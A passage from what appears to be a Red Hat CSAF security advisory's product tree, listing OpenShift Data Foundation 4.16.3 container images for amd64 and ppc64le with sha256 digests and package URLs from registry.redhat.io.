"name": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"product": {
"name": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"product_id": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"product_id": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"product_id": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"product_id": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.16.3-1"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"product_id": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"product_id": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"product_id": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"product_id": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"product_id": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"product_id": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"product_id": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"product_id": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"product_id": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"product": {
"name": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"product_id": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"product_id": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"product": {
"name": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"product_id": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"product_id": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"product_identification_helper": {
